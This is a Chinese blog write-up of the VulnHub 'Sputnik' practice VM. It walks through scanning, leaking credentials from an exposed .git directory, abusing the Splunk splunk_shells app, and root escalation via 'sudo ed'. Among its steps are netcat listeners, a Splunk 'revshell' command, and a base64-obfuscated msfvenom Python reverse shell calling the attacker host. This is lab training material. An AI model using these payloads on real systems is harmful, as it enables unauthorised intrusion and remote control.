vulnhub靶场-Sputnik

最新推荐文章于 2024-06-27 23:16:51 发布
最新推荐文章于 2024-06-27 23:16:51 发布
阅读量1.6k 收藏
点赞数
分类专栏: 网络安全 文章标签: web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42947816/article/details/127349282
版权

1、靶机信息

靶机名称:Sputnik

靶机难度:简单

虚拟机环境:此靶机推荐使用Virtualbox搭建

目标:取得root权限

靶机地址:https://download.vulnhub.com/sputnik/Sputnik.ova

kali服务器IP

192.168.3.41

靶机IP

192.168.3.42

2、主机发现

2.1 通过arp协议进行同段主机发现,192.168.3.42是我们的目标靶机

sudo arp-scan -l

2.2 使用nmap进行全端口发现

nmap -p- 192.168.3.42

2.3 对发现的端口进行服务版本扫描

nmap -sV -p 8089,55555,61337 192.168.3.42

端口号

服务名称

8089

Splunkd httpd

55555

Apache httpd 2.4.29

61337

Splunkd httpd

2.4 访问8089端口,rpc链接访问后显示Invalid request,services和servicesNS链接访问后显示401认证,static链接访问后显示404 Not Found

https://192.168.3.42:8089/

2.5 访问55555端口,有一个小游戏

http://192.168.3.42:55555/

2.6 访问61337端口,splunk enterprise登陆界面

http://192.168.3.42:61337/en-US/account/login?return_to=%2Fen-US%2F

3、Git库泄露

3.1 使用dirsearch进行目录扫描,发现git文件泄露

Git是一个可以实现有效控制应用版本的系统,但是在一旦在代码发布的时候,存在不规范的操作及配置,就很可能将源代码泄露出去。一旦攻击者或者黑客发现这个问题之后,就可能利用其获取网站的源码、数据库等重要资源信息,进而造成严重的危害。在配置不当的情况下,可能会将“.git”文件直接部署到线上环境,这就造成了git泄露问题。攻击者利用该漏洞下载.git文件夹中的所有内容。如果文件夹中存在敏感信息(数据库账号密码、源码等),通过白盒的审计等方式就可能直接获得控制服务器的权限和机会。

http://192.168.3.42:55555/.git/

sudo dirsearch -u http://192.168.3.42:55555 -e *

3.2 在.git/logs/HEAD文件中,会发现这里面记录着每一次移动HEAD时的历史记录,在里面我们找到一个clone记录

http://192.168.3.42:55555/.git/logs/HEAD

0000000000000000000000000000000000000000 21b4eb398bdae0799afbbb528468b5c6f580b975 root <root@sputnik.(none)> 1553864873 +0000 clone: from https://github.com/ameerpornillos/flappy.git

3.3 对代码仓库进行clone

git clone https://github.com/ameerpornillos/flappy

3.4 源代码结构如下

3.5 使用git log命令用于显示代码提交的历史日志记录,在历史记录中找到一个secret记录

git log -p

+sputnik:ameer_says_thank_you_and_good_job

3.6 使用账密成功登陆http://192.168.3.42:61337/

账号:sputnik

密码:ameer_says_thank_you_and_good_job

4、Splunk Shell获取

4.1 在splunk上安装github公开工具,获取其shell并武器化

https://github.com/TBGSecurity/splunk_shells

从安装手册中得知,首先从 https://github.com/TBGSecurity/splunk_shells/archive/1.2.tar.gz 下载版本,然后在splunk中选择"Manage Apps" 并且点击 "Install app from file"

4.2 选择刚下载的tar包并上传

4.3 重启splunk使其生效

4.4 重启后重新输入账密,可以看到已经部署成功

4.5 点击Permissions

4.6 选择 all apps并保存

4.7 选择app下的 Search&Reporting功能,在Search栏中可以进行命令执行

5、反弹shell

5.1 获取splunk服务器shell

Kali:nc -nvlp 9999

splunk服务器:| revshell std 192.168.3.41 9999

5.2 成功获取到shell

5.3 发现本机已安装python,使用python获取交互式shell

which python

5.4 使用 Msfvenom 创建一个python交互式shell

kali:msfvenom -p cmd/unix/reverse_python lhost=192.168.3.41 lport=6666 R

kali:nc -nvlp 6666

splunk服务器:python -c "exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHNvY2tldCAgICAgLCAgIHN1YnByb2Nlc3MgICAgICwgICBvcyAgIDsgICAgICAgICBob3N0PSIxOTIuMTY4LjMuNDE9NjY2NiAgIDsgICAgICAgICBzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQgICAgICwgICBzb2NrZXQuU09DS19TVFJFQU0pICAgOyAgICAgICAgIHMuY29ubmVjdCgoaG9zdCAgICAgLCAgIHBvcnQpKSAgIDsgICAgICAgICBvcy5kdXAyKHMwKSAgIDsgICAgICAgICBvcy5kdXAyKHMuZmlsZW5vKCkgICAgICwgICAxKSAgIDsgICAgICAgICBvcy5kdXAyKHMuZmlsZW5vKCkgICAgICwgICAyKSAgIDsgICAgICAgICBwPXN1YnByb2Nlc3MuY2FsbCgiL2Jpbi9iYXNoIik=')[0]))"

splunk服务器:python -c 'import pty;pty.spawn("/bin/bash")'

6、本地提权

6.1  使用sudo命令,查看能够执行哪些sudo命令,发现ed能够以sudo的方式执行

sudo -l

6.2 在网站检索ed命令,看看有没有提权的方式,选择sudo的形式,找到提权payload

https://gtfobins.github.io/gtfobins/ed/#sudo

6.3  使用提权命令成功提权至root

sudo ed

!/bin/sh

6.4 在root目录下找到flag.txt,本次打靶结束

KALC
关注
专栏目录
Vulhub靶场
blalaa的博客
09-05 1763
【Django JSONField/HStoreField SQL 注入漏洞 】 ①原理 Django是一款广为流行的开源web框架,由Python编写,许多网站和app都基于Django开发。其支持很多数据库引擎,包括Postgresql、Mysql、Oracle、Sqlite3等,但与Django天生为一对儿的数据库莫过于Postgresql了,Django官方也建议配合Postgresql一起使用。 在Django中支持Postgresql的数据类型:JSONField、HStoreField、Arr
Vulnhub-XXE靶场
hackerXxxt的博客
08-18 381
4.从抓取中的数据包可以看出admin.php是在xxe的目录下面,所以我们打开192.168.200.131/xxe/admin.php页面,将刚刚获取到的账号密码输入。2. 打开burp suite,抓取登录页面的数据包,可以看到XML的格式,这里就可以看出我们所要攻击的XXE漏洞了。(在线php的网站各有差异,我刚开始找的都没有显示出来,还以为是我的数据弄错了,后面试了很多个才找到可以运行出的)将读取到的数据发送到Decoder下,使用base64解密,可以得到账号和密码,密码用md5解密可以得到。
vulnhub-Chakravyuh打靶过程
dwrnxjlove的博客
03-08 4391
靶场环境: vulnhub-Chakravyuh 环境下载完成之后使用vmware打开,是一台ubuntu的虚拟机,除此之外不知道其他任何的信息: 使用 kali对局域网内存活主机进行探测Nmap -sP 172.20.10.0/24:
vulnhub靶场】Breach1打靶过程记录
didiplus
07-18 1419
Vulnhub是一个提供各种漏洞环境的一个靶场平台,大部分都是虚拟机镜像文件,预先设计各种漏洞需要使用VMware或者VirtualBox运行,每个镜像都有破解的目标,从启动虚拟机到获取系统的root权限和查看flag。.........
Vulnhub靶机】Sputnik 1
最新发布
所有文章均免费阅读,大家一起学习
06-27 1266
有效载荷通过我们现有的 Netcat 会话上传,需要做的就是将有效载荷粘贴到终端并执行,在执行之前,需要再监听6666端口,也就是Msfvenom 创建一个python交互式shell。继续访问Logs目录并单击其中的HEAD文件:http://192.168.233.143:55555/.git/logs/HEAD。在最后一条发现部署上传成功!点击:Permissions,勾选:All apps,点击:Save保存,在网站检索ed命令,看看有没有提权的方式,选择sudo的形式,找到提权payload。
【每日打靶练习】Vulnhub靶机平台-tomato
leo788的博客
12-30 1516
在网页的下边找到包含内容,通过返回信息中的用户属性得到信息:root用户可以执行shell,下方的tomato用户也可以执行shell,继续。尝试ssh连接,这里使用错误的用户名和错误的密码,输入三次后,写入日志中,检查一下log,成功获取到日志信息,可通过修改ruser来进行注入。刷新日志进行查看,发现注入未显示,证明注入成功,木马被作为代码执行,若显示则失败,代码木马作为文本执行。包含失败,这里未开放远程包含,同时本地包含文件无可再利用—》转换思路。执行后的匹配到相应漏洞,选择可能性高的来试一下。
渗透测试part(三):Vulhub配置及打靶(以Drupal CVE-2018-7600为例)
m0_56592545的博客
06-25 1184
本系列总共分成了三个部分,在第一部分中对渗透测试进行了简要的概述,第二部分通过VMware搭建了Vulnhub的一个靶机,第三部分则在Ubuntu操作系统中基于Vulhub搭建了一个靶机并借助kali的Metasploit工具快速完成了对Drupal的渗透。t=N5K3t=N5K3t=N5K3t=N5K3t=N5K3打靶-vulhub靶场-drupal-CVE-2018-7600_哔哩哔哩_bilibilihttps://www.bilibili.com/video/BV1Tv4y1C7GC/?
vulnhub之devguru靶场提权过程(vulnhub打靶日记)
guanjian_ci的博客
04-02 1274
考点:1、拿下站点、敏感文件后,需要细心的审计搜索有价值的信息,特别是账号密码。2、常见网站october、gieat的历史漏洞,利用已知漏洞反弹shell,拿下网站。3、熟悉数据库后台创建用户,添加用户组,编辑用户的操作。4、了解linux提权常用操作,内核漏洞>suid/sudo>环境变量/计划任务等等。难点:1、常见网站october、gieat的历史漏洞,这些站点的漏洞能否成功利用提权,对于小白来说是块硬骨头。2、获取mysql的frank用户时,此处用的是修改加密方式、修改密码。
camera-sputnik
05-18
"camera-sputnik"是一个专为Android平台设计的应用程序,其主要功能是通过蓝牙与Arduino设备进行通信,以便从Arduino控制的相机捕获图像。这个应用的独特之处在于它结合了硬件控制(通过Arduino)和软件交互(通过...
前端开源库-sputnik
08-29
在提供的压缩包文件“sputnik-master”中,通常包含以下内容: 1. **源代码**:项目的主体代码,包括核心模块和插件系统。 2. **文档**:详细的使用指南、API文档和示例,帮助开发者快速上手。 3. **配置文件**:...
java版ss源码-sputnik:人造卫星
06-04
Sputnik 是一个框架,它有助于遵循在 Hive 中处理数据的日常批处理作业的数据工程的良好实践。 它包含数据工程师编写和操作他们的工作所需的大部分代码。 这包括但不限于: 从此作业运行的控制台中指定的日期或日期...
sputnik-rp-content
03-06
【sputnik-rp-content】项目详解 `sputnik-rp-content`看起来是一个软件项目或者内容库的名称,但没有具体的标签信息,我们只能根据通用的IT知识来推测和解释这个项目的可能含义和相关知识点。从文件名`sputnik-rp-...
Sputnik-crx插件
03-18
Sputnik是使用免费的开源智能(OSINT)资源快速轻松地搜索IP,域,文件哈希和URL的扩展。用法•文本-选择要搜索的工件,然后单击鼠标右键•链接-右键单击链接,音频,图像,视频•选择OSINT工具•在大多数情况下,您...
红队打靶:JARBAS详细打靶思路(vulnhub
Bossfrank的博客
06-03 1947
本文是vulnhub靶机JARBAS详细打靶过程,使用kali进行渗透。不同于单纯的writeup,本文详细提供了渗透的思路和每一步的用意。
vulnhub靶场-SOCIAL NETWORK
qq_42947816的博客
05-10 593
Vulnhub旨在提供环境,让任何人都能在数字安全、计算机软件和网络管理方面获得实际的“实践”经验。
【漏洞复现-splunk-信息泄露】vulfocus/splunk-cve_2018_11409
10-15 2384
splunk-信息泄露】
海康摄像头配置、国标平台接入、萤石云平台、局域网拉流方法
热门推荐
w741852961的博客
03-14 1万+
1、查看设备ip 在Ezviz Studio软件中(设置->账号内设备->网络参数配置)查看设备Ip(eg:192.168.3.42),在高级配置->RTSP端口可以查看或修改端口 2、网页端配置入口 在网页上输入设备IP,192.168.3.42,输入账号(默认:admin)输入密码(eg:DSMY666666) 3、局域网拉流地址(RTSP协议,网页端不支持) rtsp_url = rtsp://admin:DSMY666666@192.168.3.42:5545/Stre
Vulnhub 靶场】【Funbox: GaoKao】【简单】【20210606】
惟忆
12-08 1114
靶场介绍:https://www.vulnhub.com/entry/funbox-gaokao,707/ 靶场下载:https://download.vulnhub.com/funbox/FunboxGaoKao.ova 靶场难度:简单 发布日期:2021年06月06日 文件大小:1.3 GB 靶场作者:0815R2d2 靶场系列:Funbox 靶场描述:打靶耗时:2+小时,非常的简单,而且不用做长时间爆破(我做的时候没看提示,所以依然做了一些爆破和目录扫描)
Lua进阶Web编程:从Orbit框架到WSAPI应用
“Lua进阶教程(四)Web编程.pdf”主要涵盖了使用Lua进行Web开发的相关内容,特别是通过Lua的MVC框架Orbit以及相关的网络工具和服务器,如WSAPI、Xavante和Sputnik。教程强调了Lua在Web应用程序中的灵活性,并介绍了...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值